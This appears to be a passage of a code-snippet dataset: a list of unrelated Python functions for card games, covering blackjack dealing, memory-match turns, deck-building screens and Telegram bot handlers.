self.emulator.click_button(self.ui['CARDS_UPGRADE_RESULTS_OK'].button)\n wait_until(self.emulator.is_image_on_screen, timeout=3, ui_element=card_select_ui)\n continue\n if wait_until(self.emulator.is_ui_element_on_screen, timeout=3, ui_element=self.ui['CARDS_UPGRADE_ALL_CANCEL']):\n self.emulator.click_button(self.ui['CARDS_UPGRADE_ALL_CANCEL'].button)\n self.close_after_mission_notifications()\n self.game.go_to_main_menu()", "def __init__(self, cards):\n self.cards = cards", "def user_turn(self):\r\n\r\n self.display_state() # display the current state\r\n print(\r\n '\\nTURN: You -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-')\r\n # Get the row and col number of the card you want to select\r\n x1, y1 = self.input_validation('Enter the location of the first card you pick (row, col) -> ')\r\n self.selected = [x1, y1] # a temporary holder for the first choice\r\n\r\n # Get the corresponding card ID which is also the key for the dictionary with all the cards\r\n choice1_key = self.state[x1, y1]\r\n print('The card you selected: {0}'.format(self.deck[choice1_key]))\r\n\r\n # Repeat this for your second choice\r\n x2, y2 = self.input_validation('Enter the location of the second card you pick (row, col) -> ')\r\n self.selected = [-1, -1] # reset the temporary hold\r\n\r\n choice2_key = self.state[x2, y2]\r\n print('The card you selected: {0}'.format(self.deck[choice2_key]))\r\n\r\n # Check if the two cards are a match or not\r\n if self.check_card(self.deck[choice1_key], self.deck[choice2_key]):\r\n print('MATCH')\r\n # Replace the corresponding cards in the remaining inventory and state with -1\r\n self.remaining[choice1_key] = -1\r\n self.remaining[choice2_key] = -1\r\n self.state[x1, y1] = -1\r\n self.state[x2, y2] = -1\r\n self.player_cards += 2 # the player gets 2 cards\r\n self.bin.append([x1, y1]) # move the location of the card to the already-taken bin\r\n self.bin.append([x2, y2])\r\n self.forget_memory(choice1_key) # remove from computer's memory\r\n self.forget_memory(choice2_key)\r\n self.match = 1 # player will continue to choose cards\r\n else:\r\n print('NOT a match')\r\n # Add these cards to the computer's memory\r\n self.computer_memory[choice1_key] = [x1, y1]\r\n self.computer_memory[choice2_key] = [x2, y2]\r\n self.match = 0 # computer's turn\r", "def test_consumed_cards(self):\n game = TestGames.replay(9, [3, 1, 0, 0])\n consumed_cards = game.consumed_cards()\n self.assertEqual(len(consumed_cards), 8)\n\n self.assertListEqual(list(consumed_cards),\n [2 / 5, # guards\n 0 / 2, # priest\n 1 / 2, # baron\n 0 / 2, # handmaid\n 1 / 2, # prince\n 0 / 1, # king\n 0 / 1, # countess\n 0 / 1]) # princess", "def deliver_card(data, access=None):\n\n schema = get_card_schema(data)\n if not schema:\n schema = card_schema\n data = deepcopy(data)\n\n if access is 'learn' and data['kind'] is 'choice':\n if data['order'] == 'random':\n shuffle(data['options'])\n\n if data['max_options_to_show']:\n data['options'] = data['options'][:data['max_options_to_show']]\n\n return deliver_fields(schema, data, access)", "def all_cards_selected(self, game_key):\n participants = models.Participant.query(\n models.Participant.playing == True,\n models.Participant.selected_card == None,\n ancestor=game_key).fetch()\n logging.debug(\"participants who have not selected a card: %s\", participants)\n if participants:\n return False\n else:\n return True", "def draw_a_card(cards):\n import random\n card_drawn = random.choices(card_deck)\n cards.append(card_drawn[0])\n return", "def deal_card():\r\n cards = [11, 2, 3, 4, 5, 6, 7, 8, 9, 10, 10, 10, 10]\r\n return (random.choice(cards))", "def attack(self): # need to check defenders handcount\n \"\"\"Always returns a list of values\"\"\"\n if self.AI:\n # return rand.randint(0,len(self.currentHand))\n Error(\"AI not yet implemented for Attacking\")\n else:\n print(\"Select card from... \")\n cardManager.printHand(self.currentHand)\n card = int(input(\"to your attack: \"))\n while card not in self.currentHand: # error checking\n print(\"Please select a valid card from...\", end = \" \")\n cardManager.printHand(self.currentHand)\n card = int(input())\n self.currentHand.remove(card)\n card = self.checkDoubles(card)\n return card", "def test_cards_get(self):\n pass", "def hit(self, deck):\n self.cards.append(deck.draw_card())", "def dealer_card_choice(update, context):\n query = update.callback_query\n if query.message.reply_to_message:\n user = query.message.reply_to_message.from_user\n else:\n user = query.message.chat\n bot = context.bot\n CURRENT_USER = USERS[user.username]\n CURRENT_CONTEXT = process_card_value(query.data, CURRENT_USER)\n message = f'Round: {CURRENT_CONTEXT[\"round\"]} ({CURRENT_CONTEXT[\"username\"]}) \\nDealers Card: {CURRENT_CONTEXT[\"dealer_card\"]}\\nYour Cards: {CURRENT_CONTEXT[\"player_cards\"]} \\nYour total: {CURRENT_CONTEXT[\"player_total\"]} \\n\\nChoose Dealers Card: '\n bot.edit_message_text(\n chat_id=query.message.chat_id,\n message_id=query.message.message_id,\n text=message,\n reply_markup=card_markup\n )\n\n # Tell ConversationHandler that we're in state `STRATEGY` now\n return STRATEGY", "def get_game_cards(gameId):\n pass", "def indicate_discard_card(whose_turn,players):\n cards_to_choose_from = players[whose_turn].hand.cards\n players[whose_turn].hand.print_cards()\n chosen_to_discard = int(input('Select a card to discard. Type a number. '))\n return chosen_to_discard", "def get_card_sets(self, name: str) -> List:", "def get_card(self, card):\n\n\t\tself.add_card_to_grps(card)\n\n\t\tself.grps = sorted(self.grps, key = lambda x: -len(x))\n\n\n\t\t# check if # of cards forming sets is more than 5; if yes, then break the set to allow computer to form runs\n\t\tnum_set_cards = 0\n\t\tpos = -1\n\t\tfor i in range(len(self.grps)):\n\t\t\tif len(self.grps[i]) > 1 and self.grps[i][0] == self.grps[i][1]:\n\t\t\t\tnum_set_cards += len(self.grps[i])\n\t\t\t\tpos = i\n\n\t\tif num_set_cards > 5:\n\t\t\tcard = self.grps[pos][-1]\n\t\t\tself.grps[pos].remove(card)\n\t\t\tlogger.info(f\"In computer.py/get_card: computer returned {card} to break too many set, computer = {self}\")\n\t\t\treturn card\n\n\n\t\t# if # of sets is fine, then remove a card from the group with least size\n\t\tcard = self.grps[-1][-1]\n\n\t\t\n\t\tif len(self.grps[-1]) == 1:\n\t\t\tself.grps.remove(self.grps[-1])\n\t\telse:\n\t\t\tself.grps[-1].remove(self.grps[-1][-1])\n\n\t\tlogger.info(f\"In computer.py/get_card: computer returned {card}, computer = {self}\")\n\n\t\treturn card", "def cards(\n self,\n cards: Union[List[Tuple[int, str, str]], List[Any]]\n ) -> None:\n self._cards: List[List[Tuple[int, str, str]]] = [cards]", "def deal_card():\n cards = [11, 2, 3, 4, 5, 6, 7, 8, 9, 10, 10, 10, 10]\n card = random.choice(cards)\n return card", "def get_cards(self):\n card = self._starting_card\n return card", "def __init__(self, cards = []):\n self.cards=cards", "def receive_card(self, card: Card) -> None:\n\t\tself.deck.append(card)\n\t\t\n\t\t# Sorts the Deck by type and colour for aesthetic purposes\n\t\t\"\"\"self.deck.sort(key=lambda x: repr(x.type))\n\t\tself.deck.sort(key=lambda x: repr(x.colour))\"\"\"", "def choice():\n list_cards = [0, 0, 0, 0, 2, 2, 2, 2, 3, 3, 3, 3, 4, 4, 4, 4, 5, 5, 5, 5, 6, 6, 6, 6, 7, 7, 7, 7, 8, 8, 8, 8, 9, 9,\n 9, 9, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10]\n list_cards= list_cards*4\n play_1 = random.choice(list_cards)\n list_cards_1 = list_cards\n list_cards_1.remove(play_1)\n dealer_1 = random.choice(list_cards_1)\n list_cards_1.remove(dealer_1)\n play_2 = random.choice(list_cards_1)\n list_cards_1.remove(play_2)\n dealer_2 = random.choice(list_cards_1)\n list_cards_1.remove(dealer_2)\n list1=[play_1,play_2]\n list=[dealer_1,dealer_2]\n return (list1,list,list_cards_1)", "def card_selSource(self, **kwargs):\n if \"cardsrc\" in kwargs:\n if kwargs[\"cardsrc\"] == \"hand\":\n selectfrom = self.piles[Piles.HAND]\n elif kwargs[\"cardsrc\"] == \"played\":\n selectfrom = self.piles[Piles.PLAYED]\n elif kwargs[\"cardsrc\"] == \"discard\":\n selectfrom = self.piles[Piles.DISCARD]\n else:\n selectfrom = kwargs[\"cardsrc\"]\n else:\n selectfrom = self.piles[Piles.HAND]\n return selectfrom", "def selectAmbassadorInfluence(self, choices, influenceRemaining):\n # todo: raise notImplemented. should be overriden by the input class\n \n selected = []\n for i in range(influenceRemaining):\n card = random.choice(choices)\n selected.append(card)\n choices.remove(card)\n \n return selected", "def get_cards(query_param):\n return _query_scryfall(query_param)", "def add_card(self, added_cards):\n\n self.hand[:0] = added_cards", "def deal_cards(self):\n aux = random.randint(0, len(self.deck))\n card = self.deck[aux]\n self.deck.pop(aux)\n print(f\"Received: {card}\")\n return card", "def cards(self):\n return self._cards", "def test_cards_get_list(self):\n pass", "def step(self, action):\n assert self.completed_rounds < self.num_rounds\n\n player = self.players[self.current_player_id]\n card = action\n\n if card not in player.hand:\n raise ValueError(\"Action not allowed because the card is not in the player's hand\")\n\n player.hand.remove(card)\n player.played.add(card)\n # print(f\"Player {self.current_player_id} with hand {[c.id for c in player.hand]} played the card {card.id}\")\n best_combination_on_the_table = self._get_best_combination(card)\n if best_combination_on_the_table:\n self.last_player_capturing_id = self.current_player_id\n player.captured.add(card)\n for c in best_combination_on_the_table:\n self.table.remove(c)\n player.captured.add(c)\n if not self.table and not (self._is_last_round and self._is_round_over()):\n player.scope += 1\n else:\n self.table.add(card)\n # print(f\"Cards on the table after play: {[c.id for c in self.table]}\")\n\n if self._is_round_over():\n self.completed_rounds += 1\n # print(f\"=========== Round {self.current_round} completed ============\")\n self.current_player_id = (self.current_player_id + 1) % self.num_players\n\n if self.is_over():\n last_player_capturing = self.players[self.last_player_capturing_id]\n # print(f\"Giving the remaining cards to player {last_player_capturing.player_id}\")\n for card in self.table:\n last_player_capturing.captured.add(card)\n self.table = set()\n assert all([len(p.played) == 10 for p in self.players])\n assert all([len(p.hand) == 0 for p in self.players])\n return self.get_state(), self.current_player_id", "def action_hit(self) -> None:\n print(self.deal_card(self.user))", "def check_selected_card(_player1, _player2):\n if _player1.selected_card and _player2.selected_card:\n color = _player1.selected_card.suit\n if _player2.selected_card.suit != color and check_color_card(_player2, color):\n _player2.selected_card = None", "def collect_cards():\n \n cards_list = []\n while (cards_input := input(\"Enter card: \")) != '#':\n i = cards_input.upper()\n if not is_valid(i):\n print(f\"Please enter a valid card.\")\n continue\n cards_list.append(i)\n cards_decoded = [Board.translate(card) for card in cards_list]\n return cards_decoded", "def Send_newCards(self, cards): \n serialized = [c.serialize() for c in cards]\n self.Send({\"action\": \"newCards\", \"cards\": serialized})", "def __init__(self):\n self.cards = [Card(face=card[0], value=card[1], suit=suit)\n for card in CARD_VALUES().items() for suit in CARD_SUITS()]", "def check_card_action(self, card):\n if card.value == \"7\":\n self.seven_punishment()\n elif card.value == \"8\":\n self.eight_punishment()\n elif card.value == \"9\":\n self.nine_punishment()\n elif card.value == \"B\":\n self.jack_wish()", "def hook_buy_this_card(self, game, player):\n totrash = [c for c in player.piles[Piles.PLAYED] if c.isTreasure()]\n for c in totrash:\n player.output(f\"Mint trashing {c.name}\")\n player.trash_card(c)", "def get_card_info_list(self):\n self._get_card_info_list = pa_card_info_cb_t(self._card_info_cb)\n pa_context_get_card_info_list(self._context,\n self._get_card_info_list,\n None)", "def hit(self, deck):\n self.showOneCard = False\n while self.getPoints() < 17:\n self.cards.append(deck.deal())", "def __refresh_search_results(self):\n\n # Define the query\n try:\n query = CardQuery()\n query.max_count = int(self.__box_count.get_text())\n query.max_proficiency = self.__combo_proficiency.get_index()\n query.max_score = float(self.__box_score.get_text())\n if self.__combo_card_type.get_index() > 0:\n query.card_type = getattr(WordType, self.__combo_card_type.get_text())\n except:\n cards = []\n traceback.print_exc()\n else:\n # Query the cards\n cards = []\n for card in self.__cards_source.get_cards():\n study_data = self.__study_database.get_card_study_data(card)\n if query.matches(card, study_data):\n cards.append((card, study_data))\n\n # Sort the list\n sort_method = self.__combo_sort.get_text()\n if sort_method == SortMethod.RANDOM:\n random.shuffle(cards)\n all_cards = list(cards)\n cards = []\n while all_cards and len(cards) < query.max_count:\n index = random.randrange(len(all_cards))\n elem = all_cards[index]\n del all_cards[index] \n cards.append(elem)\n elif sort_method == SortMethod.LOWEST_SCORE:\n cards.sort(key=lambda x: x[1].get_history_score())\n elif sort_method == SortMethod.OLDEST:\n cards.sort(key=lambda x: x[1].get_last_encounter_time() or x[1].get_history_score())\n elif sort_method == SortMethod.NEWEST:\n cards.sort(key=lambda x: x[1].get_last_encounter_time() or x[1].get_history_score(), reverse=True)\n\n cards = cards[:query.max_count]\n\n # Define the study params\n params = StudyParams()\n params.random_side = self.__combo_side.get_index() == 0\n params.random_form = self.__checkbox_random_forms.is_checked()\n params.shown_side = (CardSide.English if self.__combo_side.get_index() == 1\n else CardSide.Russian)\n self.__study_params = params\n\n # Define the scheduler params\n self.__scheduler_params = SchedulerParams(\n max_repetitions=1 if self.__checkbox_only_once.is_checked() else 0)\n \n # Popluate the table\n self.__table_cards.clear()\n for card, study_data in cards:\n color = Config.proficiency_level_colors[study_data.get_proficiency_level()]\n row = self.__table_cards.add(card, color=color)\n cards = [card for card, _ in cards]\n\n self.__cards = cards\n self.__button_begin.set_enabled(len(cards) > 0 and self.__study_params)\n self.__label_result_count.set_text(\"{} Results\".format(len(self.__cards)))", "def hit(\n self,\n card: List[Tuple[int, str, str]],\n card_index: int = 0\n ) -> None:\n self._cards[card_index].extend(card)", "def refresh(self):\n self.deck = []\n\n for _suit in Suit:\n for _face in Face:\n self.insert(Card(_suit, _face, self))", "def _cards_getter(self):\n pass", "def add_cards(self, cards):\n self.get_cards().extend(cards)", "async def get_available_cards(self, game_id): # pass in a list of card ids\n all_cards = await self.get_all_cards()\n available_cards = []\n game = await self.get_game(game_id)\n player1_cards = await self.get_current_cards(game[1])\n player2_cards = await self.get_current_cards(game[2])\n for card in all_cards:\n if card not in player1_cards and card not in player2_cards:\n available_cards.append(card)\n return available_cards", "def draw_card(self, card):\n self.current_hand.append(card)", "def get_selected_card(self, pos, double_clicking=False):\n if self.selectable:\n double_select = False\n relative_pos_x = pos[0] - self.x\n relative_pos_y = pos[1] - self.y\n mouse_pos = (relative_pos_x, relative_pos_y)\n self.selected_card = -1\n if not self.draw_from_last:\n for i, card in enumerate(reversed(self.cards)):\n if card.rect.collidepoint(mouse_pos):\n self.selected_card = len(self.cards) - 1 - i\n break\n else:\n for i, card in enumerate(self.cards):\n if card.rect.collidepoint(mouse_pos):\n self.selected_card = i\n break\n\n if self.prev_selected[-1] == self.selected_card:\n if not double_clicking:\n self.selected_card = -1\n\n self.record_selected_history()\n self.update_deck_display()\n\n selected_history = [sel for sel in self.prev_selected if sel >= 0]\n\n return (len(selected_history) == 2 and self.prev_selected.count(self.selected_card) == 2\n and self.selected_card >= 0) and double_clicking\n return False", "def deal_card():\n cards = [11, 2, 3, 4, 5, 6, 7, 8, 9, 10, 10, 10, 10]\n random_card = random.choice(cards)\n return random_card", "def select_card(player, _mouse_x=None, _mouse_y=None):\n if _mouse_x:\n for card in player.cards:\n lower_x = card.positionx\n lower_y = card.positiony\n if lower_x < _mouse_x < lower_x + 100 and lower_y < _mouse_y < lower_y + 100:\n player.selected_card = card", "def receive_chance_card(self, card):\r\n self.chance_cards.append(card)", "def build_deck_screen_my_deck_card_display(screen,buttons, screen_status, button_status, card_database_filter, user):\n # Draw the character card\n if user.character_card == '':\n pass\n else:\n user.character_card.rect.x = 65\n user.character_card.rect.y = 600\n screen.blit(user.character_card.image, user.character_card.rect)\n #Clear duplicate amount each frame and render the refined list\n for card_new in user.deck_list:\n card_new.duplicate = 1\n local_store_list = build_deck_screen_my_deck_card_list_refine(user)\n #use refined list to draw\n rect_position_x = 245 #local variables for rect position for the first card in the user deck\n rect_position_y = 600\n row_number = 1\n #Display cards in local_store_list:\n\n if screen_status.build_deck_screen_my_deck_page_id <= 0:\n screen_status.build_deck_screen_my_deck_page_id = 1\n # Edge cases when len() = 6,12,18....\n if len(local_store_list) % 6 == 0 and len(local_store_list) != 0:\n if screen_status.build_deck_screen_my_deck_page_id >= (len(local_store_list))//6 + 1:\n screen_status.build_deck_screen_my_deck_page_id = (len(local_store_list))//6 + 0\n\n else:\n if screen_status.build_deck_screen_my_deck_page_id >= (len(local_store_list))//6 + 2:\n screen_status.build_deck_screen_my_deck_page_id = (len(local_store_list))//6 + 1\n # Algorithm to draw all cards in local_store_list, 6 card per page.\n for card in local_store_list[6*(screen_status.build_deck_screen_my_deck_page_id - 1):6 * screen_status.build_deck_screen_my_deck_page_id]:\n if row_number <= 6:\n card.rect.x = rect_position_x\n card.rect.y = rect_position_y\n screen.blit(card.image, card.rect)\n rect_position_x += 145\n row_number += 1\n build_deck_screen_my_deck_duplicate_number_display(card, screen)\n if row_number >= 7:\n row_number = 1", "def deal_cards(self):\n self.card = random.randint(1, 13)\n return self.card", "def deal_opening_cards(self) -> None:\r\n for i in range(self.num_of_players):\r\n self.dealer.deal_cards_to(self.players[i].cards_stack, PokerRules.CARDS_PER_PLAYER)", "def cards_to_deal(cls, context={}):\n\t\traise NotImplementedError()", "def cards():\n if user_loggined():\n user = models.User.query.get(session['user_id'])\n u_cards = user.cards.all()\n prep_cards = []\n for card in u_cards:\n prep_cards.append(card.type + ' **** '+card.cnb[-9:])\n else:\n return redirect(url_for('index'))\n return redirect(url_for('index'))", "def take(self, table):\n # take card\n self.hand.add(table.card)\n table.card = table.cards.pop()\n # take chips\n self.chips += table.chips\n table.chips = 0", "def receive_card(self, card, new_suite=None, is_using_chameleon=False):\n assert isinstance(card, tuple)\n assert len(card) == 2\n\n if card.value == 14 or card.value == self.chameleon and is_using_chameleon:\n assert new_suite != None, print('You must specify a new suite.')\n assert new_suite in ['hearts', 'spades', 'diamonds', 'clubs']\n\n self.current_suite = new_suite\n self.current_value = None\n\n else:\n self.cards.append(card)\n self.current_suite = card.suite\n self.current_value = card.value", "def card_output():\n cards = [11, 2, 3, 4, 5, 6, 7, 8, 9, 10, 10, 10, 10]\n return random.choice(cards)", "def initial_draw(self):\n self.player.take_card(self.deck)\n self.dealer.take_card(self.deck)\n self.player.take_card(self.deck)\n self.dealer.put_face_down(self.deck)", "def get_options(cls, player, context={}):\n\t\toptions = []\n\t\tfor card in player.hand:\n\t\t\tif cls.can_be_played(card, context):\n\t\t\t\toptions.extend(card.actions)\n\t\toptions.append(Action(None, \"DRAW\", [DrawCard]))\n\t\treturn options", "def check_cards_eligibility(self):\n for c in self.hand:\n c.check_actions(self)\n for c in self.phand:\n c.check_actions(self)\n for c in self.discard:\n c.check_actions(self)\n for c in self.active_player.phand:\n c.check_actions(self)\n for c in self.active_player.hand:\n c.check_actions(self)\n for c in self.active_player.discard:\n c.check_actions(self)\n for c in self.played_user_cards:\n c.check_actions(self)\n if ACTION_KEEP in self.actions:\n for p in self.players:\n for c in p.phand:\n c.check_actions(self)\n for c in p.hand:\n c.check_actions(self)\n for c in p.discard:\n c.check_actions(self)", "def get_hand(self):\n return self.cards", "def get_cards(self):\n return deepcopy(self._cards)", "def lobby_screen_pick_deck_display(ai_settings, screen, buttons,screen_status, button_status, card_database_filter, user, action, player2):\n # Pick deck text\n button_text_1 = Button('Pick an exist deck or create a new one: ','', (250,250,250),400, 100, 400, 35, font_color = (0,0,0), alpha = 150)\n button_text_1.update()\n button_text_1.draw(screen)\n\n # Deck list buttons\n with open('user_deck_list_string.txt','r') as f:\n f.seek(0)\n if len(f.readlines()) >= 12:\n pass\n else:\n button_new_deck = Button('+ New Deck','', (250,250,250),1020, 110, 120, 35, font_color = (0,0,0), alpha = 150)\n button_new_deck.update()\n button_new_deck.draw(screen)\n\n\n f.seek(0)\n x = len(f.readlines())\n y = 0\n deck_list_index = 0\n\n for i in range(1,7):\n f.seek(0)\n for line in f:\n if 'DECK_LIST_' + str(i) not in line:\n y += 1\n if y < x: # DECK_LIST_i exist\n f.seek(0)\n for line in f:\n if 'DECK_LIST_' + str(i) in line:\n deck_length = len(make_card_list_from_string(line.replace('DECK_LIST_' + str(i) + ' = ', ''), ai_settings, screen, buttons,screen_status, button_status, card_database_filter, user, player2))\n # deck_length = int((len(line.replace('DECK_LIST_' + str(i) + ' = ', '')) -1)/14)\n if 'CHARACTER_' + str(i) in line:\n character_length = 1\n character_card = eval('card_' + line.replace('CHARACTER_' + str(i) + ' = ', '')[7:12])\n\n if user.deck_list_index == str(i):\n\n button_top = Button(character_card.name + ': ','', (100,30,130),85 + 180* (i-1), 165, 130, 60)\n button_top.update()\n button_top.draw(screen)\n\n if deck_length < 40:\n button_bottom = Button(str(character_length) + '/1 | ' + str(deck_length) +'/40','', (100,30,130),85 + 180* (i-1), 225, 130, 50, font_color = (250,0,0))\n button_bottom.update()\n button_bottom.draw(screen)\n else:\n button_bottom = Button(str(character_length) + '/1 | ' + str(deck_length) +'/40','', (100,30,130),85 + 180* (i-1), 225, 130, 50)\n button_bottom.update()\n button_bottom.draw(screen)\n\n else:\n\n button_top = Button(character_card.name + ': ','', (160,160,160),85 + 180* (i-1), 165, 130, 60, alpha = 240)\n button_top.update()\n button_top.draw(screen)\n\n if deck_length < 40:\n button_bottom = Button(str(character_length) + '/1 | ' + str(deck_length) +'/40','', (160,160,160),85 + 180* (i-1), 225, 130, 50, font_color = (200,0,0), alpha = 240)\n button_bottom.update()\n button_bottom.draw(screen)\n else:\n button_bottom = Button(str(character_length) + '/1 | ' + str(deck_length) +'/40','', (160,160,160),85 + 180* (i-1), 225, 130, 50, alpha = 240)\n button_bottom.update()\n button_bottom.draw(screen)\n\n y = 0\n\n else: # DECK_LIST_i not exist\n\n button = Button('Empty','', (200,200,200),85 + 180* (i-1), 165, 130, 110, alpha = 80)\n button.update()\n button.draw(screen)\n\n y = 0\n\n\n for i in range(1,7):\n if user.deck_list_index == str(i):\n button_edit = Button('Edit','', (50,50,170),85 + 180* (i-1), 282, 60, 30)\n button_edit.update()\n button_edit.draw(screen)\n\n button_delete = Button('Delete','', (160,30,30), 155 + 180* (i-1), 282, 60, 30)\n button_delete.update()\n button_delete.draw(screen)", "def hit(hand=bj.player1.hand):\r\n hand.append(bj.deck.remove_card())", "def test_play_card(self):\n self.plr.piles[Piles.DECK].set(\"Silver\", \"Province\", \"Moat\", \"Gold\")\n self.vic.piles[Piles.DECK].set(\"Duchy\")\n self.plr.test_input = [\"discard\", \"discard\", \"putback\"]\n self.plr.play_card(self.card)\n self.g.print_state()\n self.assertEqual(self.plr.actions.get(), 1)\n self.assertIn(\"Duchy\", self.vic.piles[Piles.DISCARD])\n self.assertIn(\"Gold\", self.plr.piles[Piles.DISCARD])\n self.assertIn(\"Province\", self.plr.piles[Piles.HAND])\n self.assertIn(\"Moat\", self.plr.piles[Piles.HAND])\n self.assertIn(\"Silver\", self.plr.piles[Piles.DECK])", "def hit(self, deck):\n try:\n self.hand.append(deck.pop(0))\n except IndexError:\n print('There are no more cards in the deck!')", "def get_cards(self):\n return [card.view_model() for card in self._deck.loc]", "def deal(self, cards_num):\n\n cards = []\n while cards_num > 0:\n\n x = random.randint(0, 53)\n if self.in_use[x] == 0:\n self.in_use[x] += 1\n cards.append(x)\n cards_num -= 1\n\n return cards", "def player_card_one_choice(update, context):\n query = update.callback_query\n if query.message.reply_to_message:\n user = query.message.reply_to_message.from_user\n else:\n user = query.message.chat\n bot = context.bot\n CURRENT_CONTEXT = USERS[user.username]\n message = f'Round: {CURRENT_CONTEXT[\"round\"]} ({CURRENT_CONTEXT[\"username\"]}) \\nDealers Card: {CURRENT_CONTEXT[\"dealer_card\"]}\\nYour Cards: {CURRENT_CONTEXT[\"player_cards\"]} \\nYour total: {CURRENT_CONTEXT[\"player_total\"]} \\n\\nChoose Your 1st Card: '\n bot.edit_message_text(\n chat_id=query.message.chat_id,\n message_id=query.message.message_id,\n text=message,\n reply_markup=card_markup\n )\n\n return PLAYER_CARD_TWO", "def main():\n\n # call to OS for positioning window\n os.environ['SDL_VIDEO_WINDOW_POS'] = \"%d,%d\" % (0, 25)\n\n # Initialization block\n pygame.init() # Initialize pygame module\n screen = pygame.display.set_mode((SCREEN_WIDTH, SCREEN_HEIGHT)) # initialize screen\n\n # Testing\n # model_card = m_card.Card(m_card.CardType.TEMPURA)\n # view_card = v_card.CardView(screen, model_card)\n\n deck = Deck()\n player = Player()\n b_pack = deck.generate_booster(10)\n player.booster_pack = b_pack\n\n hand_view = HandView(screen, (0, SCREEN_HEIGHT - SCREEN_HEIGHT / 5), (SCREEN_WIDTH, SCREEN_HEIGHT / 5), player)\n pick_crds = PickedCardsView(screen, (0, 0), (SCREEN_WIDTH, SCREEN_HEIGHT / 5), player, 0)\n pick_crds2 = PickedCardsView(screen, (0, 0), (SCREEN_WIDTH, SCREEN_HEIGHT / 5), player, 180)\n # Game loop\n while True:\n\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n sys.exit()\n\n elif event.type == pygame.MOUSEBUTTONUP:\n is_clicked([hand_view, pick_crds, pick_crds2], pygame.mouse.get_pos())\n screen.fill((0, 0, 0))\n hand_view.draw()\n pick_crds.draw()\n pick_crds2.draw()\n pygame.display.flip()", "def battle_screen_my_hand_card_display(screen,buttons, screen_status, button_status, card_database_filter, user):\n rect_position_x = 100\n rect_position_y = 610\n row_number = 1\n if screen_status.battle_screen_action_indicator == 'stage-0':\n pass\n else :\n\n if screen_status.battle_screen_my_hand_page_id <= 0:\n screen_status.battle_screen_my_hand_page_id = 1\n # Edge cases when len() = 6,12,18....\n if len(user.hand_list) % 7 == 0 and len(user.hand_list) != 0:\n if screen_status.battle_screen_my_hand_page_id >= (len(user.hand_list))//7 + 1:\n screen_status.battle_screen_my_hand_page_id = (len(user.hand_list))//7 + 0\n\n else:\n if screen_status.battle_screen_my_hand_page_id >= (len(user.hand_list))//7 + 2:\n screen_status.battle_screen_my_hand_page_id = (len(user.hand_list))//7 + 1\n # Algorithm to draw all cards in local_store_list, 6 card per page.\n for card in user.hand_list[7*(screen_status.battle_screen_my_hand_page_id - 1):7 * screen_status.battle_screen_my_hand_page_id]:\n if row_number <= 7:\n card.rect.x = rect_position_x\n card.rect.y = rect_position_y\n screen.blit(card.image, card.rect)\n rect_position_x += 145\n row_number += 1\n if row_number >= 8:\n row_number = 1", "def dealCards(deck, player, numCards):\n print \"dealing %s cards to %s...\" % (numCards, player.name)\n for card in range(numCards):\n card = deck[0]\n deck.pop(0)\n player.cards.append(card)\n print \"added %s card for %s\" % (card, player.name)\n print player.cards", "def setup_cards(self, server):\r\n\t\tversions_list = self.ice.getVersionsList()\r\n\t\talarm_list = self.ice.getAlarmStatus()\r\n\t\tstatus_list = self.ice.getStatus()\r\n\t\twarning_list = self.ice.getWarnings()\r\n\r\n\t\tdateTimeObj = datetime.now()\r\n\t\ttimestampStr = dateTimeObj.strftime(\"%d-%b-%Y (%H:%M:%S)\")\r\n\t\tcards = self.ice.getCardsAlive()\r\n\t\tfor i in range(len(versions_list)):\r\n\t\t\tjson_body = versions_list[i]\r\n\t\t\tjson_body.update({'alarm':alarm_list[i],'status':status_list[i], 'card':cards[i], 'warning':warning_list[i],'update':timestampStr, 'hostname':self.ip})\r\n\t\t\tserver.index(index='icepap_info', id=self.ip + '_' + str(cards[i]), body=json_body)", "def getAllCards(self):\n return self._cards", "def build_deck_screen_card_gallery_card_display(screen, buttons, screen_status, button_status, card_database_filter):\n rect_position_x = 100 #local variables for rect position for the first card in the card gallery\n rect_position_y = 130\n row_number = 1 # local variable to help keep track of position of card\n # Check the page number to make sure if will not go negative or randomly large\n if screen_status.build_deck_screen_card_gallery_page_id <= 0:\n screen_status.build_deck_screen_card_gallery_page_id = 1\n # Edge cases when len() = 14, 28, 42...\n if len(cdf.request_card_list(card_database_filter)) % 14 == 0 and len(cdf.request_card_list(card_database_filter)) != 0:\n if screen_status.build_deck_screen_card_gallery_page_id >= (len(cdf.request_card_list(card_database_filter)))//14 + 1:\n screen_status.build_deck_screen_card_gallery_page_id = (len(cdf.request_card_list(card_database_filter)))//14 + 0\n\n else:\n if screen_status.build_deck_screen_card_gallery_page_id >= (len(cdf.request_card_list(card_database_filter)))//14 + 2:\n screen_status.build_deck_screen_card_gallery_page_id = (len(cdf.request_card_list(card_database_filter)))//14 + 1\n # Algorithm to draw all cards in request_card_list, 14 card per page.\n for card in cdf.request_card_list(card_database_filter)[14*(screen_status.build_deck_screen_card_gallery_page_id - 1):14 * screen_status.build_deck_screen_card_gallery_page_id]:\n if row_number <= 7:\n card.rect.x = rect_position_x\n card.rect.y = rect_position_y\n screen.blit(card.image, card.rect)\n rect_position_x += 145\n row_number += 1\n elif row_number <= 14:\n card.rect.x = rect_position_x - 1015\n card.rect.y = rect_position_y + 200\n screen.blit(card.image, card.rect)\n rect_position_x += 145\n row_number += 1\n if row_number >= 15:\n row_number = 1", "def setup_newgame(self):\n global chips\n self.bet = 100\n if chips < self.bet: \n self.game_over = True\n chips -= self.bet\n \n\n self.cards_list = arcade.SpriteList()\n\n #resets on newgame\n self.top_card_int = 0 ## this had to be moved here to make it so that you are not drawing over the 52 card limit\n self.player_hand = []\n self.dealer_hand = []\n self.player_value = 0\n self.dealer_value = 0\n self.player_ace_count = 0\n self.dealer_ace_count = 0\n self.player_almost_bust = 0\n self.dealer_almost_bust = 0\n self.blackjack = False\n self.victory = False\n self.defeat = False\n \n #creates deck\n for card_suit in CARD_SUITS:\n for card_value in CARD_VALUES:\n card = Card(card_suit, card_value, CARD_SCALE)\n self.cards_list.append(card)\n #shuffles deck\n for pos1 in range(len(self.cards_list)):\n pos2 = random.randrange(len(self.cards_list))\n self.cards_list.swap(pos1, pos2)\n \n #Current way to add cards to player and dealer hands since using .pop() on self.cards_list deletes the card itself even in the other hands\n \n #self.dealer_hand.append(self.top_card_int)\n self.hit(\"dealer\")\n self.dealer_hand[0].face_down()\n #first_card = self.dealer_hand[0]\n #first_card.face_down()\n 